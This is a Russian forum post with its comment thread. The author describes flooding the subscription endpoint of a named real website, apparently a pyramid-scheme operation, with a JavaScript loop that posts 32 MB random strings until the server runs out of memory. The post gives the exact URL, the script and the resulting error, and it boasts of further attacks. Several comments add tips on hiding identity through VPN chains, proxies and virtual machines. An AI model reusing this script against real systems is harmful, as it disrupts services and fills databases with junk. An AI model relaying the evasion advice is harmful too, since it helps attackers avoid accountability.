Шлём `Привет` кэшбери⁠⁠

Не долго парясь нахожу в интернете их сайт http://gdc.group

Ооокей... Смотрим что там и как. И оказывается что фильтр почты, которую к ним на рассылку можно закинуть - фиктивный. Те если отправить руками то можно записать что угодно.

http://gdc.group/files/action/ajax.php?email=1

Методом перебора узнаём что под поле почты выделено 32милиионов(2^25) символов строка... А это 32 мегабайта.

Пишем небольшой скрипт

i=0; spam = () => { $.post('http://gdc.group/files/action/ajax.php', { email: Array(2**25).fill().map(()=>{ return String.fromCodePoint(~~(Math.random(1, 255) * 255)) }).join('') }, (a)=>{console.log(++i, a); spam();}); }; spam();

Хотя на деле лучше степень 20 гдето, потому как на лимите там памяти не хватает.

Ну и итого всё..) Память у сервиса кончилась, удачи разрабам разгребать говно и фиксить дыры..)

Как минимум гигов на 10 в базу я поднасрать успел, пока память не закончилась... Если ребутнут не пофиксив, продолжим...

Такие успешные парни, а найти разраба не из студентов не смогли =\

Теперь всегда так:

Fatal error: Allowed memory size of 268435456 bytes exhausted (tried to allocate 4304128 bytes) in /home/bitrix/ext_www/gdc.group/files/action/ajax.php on line 8

Ещё и битрикс... Фи...

773

Вы смотрите срез комментариев. Показать все

121

TabbySquirrel

6 лет назад

А потом на топикстартера подают в суд за умышленное нарушение работы сервиса и вешают всю упущенную "прибыль" :Р

раскрыть ветку (43)

HappyBanditPanda

6 лет назад

Кто подаст- то? Организация зарегистрированная в офшорах чтоли? Да и на кого? Ты сначала ТСа идентифицируй и найди, а уж потом подавай :)

раскрыть ветку (38)

100

ser60v

6 лет назад

Бля, на самом деле это не трудно, но на деле касательно этого никто париться не будет, да и ущерба я не нанёс особо, а если что серьезнее пойдет, там я уже рассказывать не буду, да и хрен кто докажет)

раскрыть ветку (30)

Worak

6 лет назад

Я решил проверить насколько не сложно.

Ты меня просто поразил, гугл разве что ключи от квартиры мне не выдал.

раскрыть ветку (20)

ser60v

6 лет назад

Лично меня найти достаточно легко..)

раскрыть ветку (19)

TheIndependent

6 лет назад

Да, Серёг, ты бы это, чуть поанонимнее ники придумывай) Велосипеды и путешествия это конечно хорошо, но надо немного больше фантазии )))

раскрыть ветку (18)

ser60v

6 лет назад

Анонимнее ник - это когда мне нужна анонимность. Тут мне не нужна анонимность.

раскрыть ветку (16)

webpauk

6 лет назад

москва, 3-я улица строителей, 26

раскрыть ветку (13)

apepenkov

6 лет назад

@ser60v, это правда?

раскрыть ветку (12)

ser60v

6 лет назад

У меня есть сайт. Который, о хоспади ищется по нику моему ) Там есть все мои контакты)

Более того я хожу регулярно на тренировки в одни и теже места..)

раскрыть ветку (11)

webpauk

6 лет назад

Товарищ майор, успели записать?

раскрыть ветку (6)

ser60v

6 лет назад

Конкретно меня найти если есть мой ник с пикабу не сложно. Вопрос в том, что я не считаю что я что либо нарушил на столько что мне что либо будет. Если я ошибся, то увы )

раскрыть ветку (5)

DELETED

6 лет назад

ты серьезно со своими светящимися данными написал на пикабу как ты юзнул небольшую дырку на сайте разводил, с которыми (скорее всего) в сговоре правоохранительные органы?

раскрыть ветку (4)

Smetankin

6 лет назад

А ты видать веришь в теории заговора и существование иллюминаторов?)

раскрыть ветку (3)

tolstiytroll

6 лет назад

Не, ну иллюминаторы то правда существуют. На кораблях, в самолетах

раскрыть ветку (1)

kdargosun

6 лет назад

У них даже своё радио есть.

DELETED

6 лет назад

На самом деле нет. Но, кэшберри существует с 01.2017, обратили на него внимание 09.2018. 20 месяцев чистой работы, какой удивительный срок для пирамиды. В итоге ни одного уголовного дела. При этом чел с ютуба без проблем находит реальную личность главного лица кэшбери. Совпадение?

NicoleMJ

6 лет назад

По-хорошему надо чтоб за тобой сейчас не ФСБ выехало, а какая-нибудь нормальная девушка с минимальным содержанием тараканов.

По себе знаю, депрессия - занятие ниже среднего. В жизни столько веселой херни происходит, а ты сидишь в углу и смотришь внутрь себя, серый, апатичный и ничего не хотящий. Выбирайся.

apepenkov

6 лет назад

При открытии меню чуть-чуть верстка съезжает, влом чинить или не знал?

раскрыть ветку (1)

apepenkov

6 лет назад

На скрине не видно почти, там пара мм

KrauzerIII

6 лет назад

Поможем скрыться от преследования, затереть все данные преступления и начать новую жизнь в Канаде, попивая кленовый сироп и потрахивая бобров.

Обращайтесь 8-800-555-35-35

раскрыть ветку (1)

ser60v

6 лет назад

Я в деле!

wearycynic

6 лет назад

Ты меня сейчас напугал прям. Потом только понял, что речь о ТС.

DarkDeath

6 лет назад

Транканут табличку или просто DELETE WHERE id>100500

Warrangie

6 лет назад

А на самом деле нервишки-то уже поднатягиваются :)

tmail

6 лет назад

Дружище, недооценивай странность работы наших органов в сфере ИТ. Ты прав, что просто так никто искать не будет, нах не надо. Но если вдруг кто то из этих олухов занесет куда надо пару лямов (а денег у них хватает), ты можешь очень внезапно приехать. И да, ты наверно рассчитываешь пойти в отказ и в "не докажете". Так вот доказывать никто ничего не будет. Ты сам во всем признаешься ) Почитай историю Паши Врублевского (гуглится легко). Может впредь поменьше будет желаний хвастаться такими подвигами на весь инет )

раскрыть ветку (1)

ser60v

6 лет назад

Если бы было не западло занести пару лямов - занесли бы пару тыщ прогеру. Там сделать нормально минут 5 просто недо не быть ебланом.

То что сделали - это просто феерическое ебланство. Это не по незнанию сделали, а по причине того что в голове дурь.

kukabukadam

6 лет назад

Развели тут демагогию. Ни один вменяемый мошенник не будет обращаться в судебные инстанции, особенно если с него есть что стрясти. Второй цикл аферы начался потому, что после первого не было судебного преследования. Пока за яйца не прихватят - не успокоятся. Это же всё очевидно.

DELETED

6 лет назад

дабл опен-впн + сокс.... думаю, ты и без меня знаешь, как сделаться невидимым для поиска)

раскрыть ветку (3)

RAEman

6 лет назад

Не забыть что все впнки и прокси должны быть тоже анонимными(т.е. зареганы не на тебя и твоего упоминания там не должно быть), еще сменить локализацию браузера, местоположение, размер окна,user agent. и ОС под двумя виртуалками с шифрованной виртуальной сетью между ними. А виртуалки на шифрованном виртуальном диске на малинке которая у тебя в кармане, чтоб если что закинуть в микроволновку и сжечь после.

раскрыть ветку (2)

MEXANIST

6 лет назад

А что, так можно было? Я на ардуине делал....

DELETED

6 лет назад

ну, эт ты уже сильно загоняешься, как по мне) впн, естесна, должны быть покупными абузоустойчивыми. Для ОС, мне сдается, хватит и одной виртуалки с чужой локализацией. А вот насчет размера окна браузера я бы мог и пообсуждать. Разрешение экрана 1280*1024 и браузер в полноэкранном режиме есть у кучи народа. А вот браузер в разрешении 1152*1011 делает слепок твоей системы почти уникальным с первого же параметра. Да и шифрованного контейнера на шифрованном разделе обычной флешки (truecrypt + drivecrypt с разными алгоритмами), как мне видится, вполне достаточно))

tosamoechyvstvo

6 лет назад

Деанонить пикабушника у ментов получится на раз два.

Сам лично видел такой документ во связи со скандалом одной из школ на западе подмосковья. На пикабу про это есть

раскрыть ветку (4)

LifeSurfer

6 лет назад

Я тут постою линк подожду.

ещё комментарии

3545246

6 лет назад

Найти, индефицировать, слепить дело и посадить - элементарно, были бы деньги. А у кэшбери они , я подозреваю есть.

раскрыть ветку (1)

ser60v

6 лет назад

Эх. Было бы за что искать)

Rugpool

6 лет назад

Все очень просто. Если все правда уверены что Кешберри это просто контора, которая обирает лохов, и у них нет влиятельной крыши, то ошибаетесь. Просто так левым людям никто не дал бы заработать пару миллиардов, за крупной пирамидой(а также за всем тем, где большие деньги) всегда стоят очень влиятельные люди.. а дальше скорее всего развитие событий такое:
ТС сам признался что это сделал он и как сделал. а также дал намек как его найти(ну при желании его нашли бы и без этого) #comment_127125540
В полицию конечно же никто подавать не будет. Но есть очень большая вероятность что к ТС приедут серьезные дяди и поставят на счетчик. Либо сломают пальцы, чтобы больше неповадно было. Есть правда еще вариант, что возьмут на работу, и это и есть коварный замысел ТС:)))
Как говорится сделал добро, лучше молчи в тряпочку. ТС же решил козырнуть тем какой он крутой, а заодно и показать на одном из самых посещаемых ресурсов рунета, дыру сайта Кешберри. а по идее мог бы развлекаться еще пару дней, так то ты им фактически сообщил что закрывать надо.

Кстати сайт уже подняли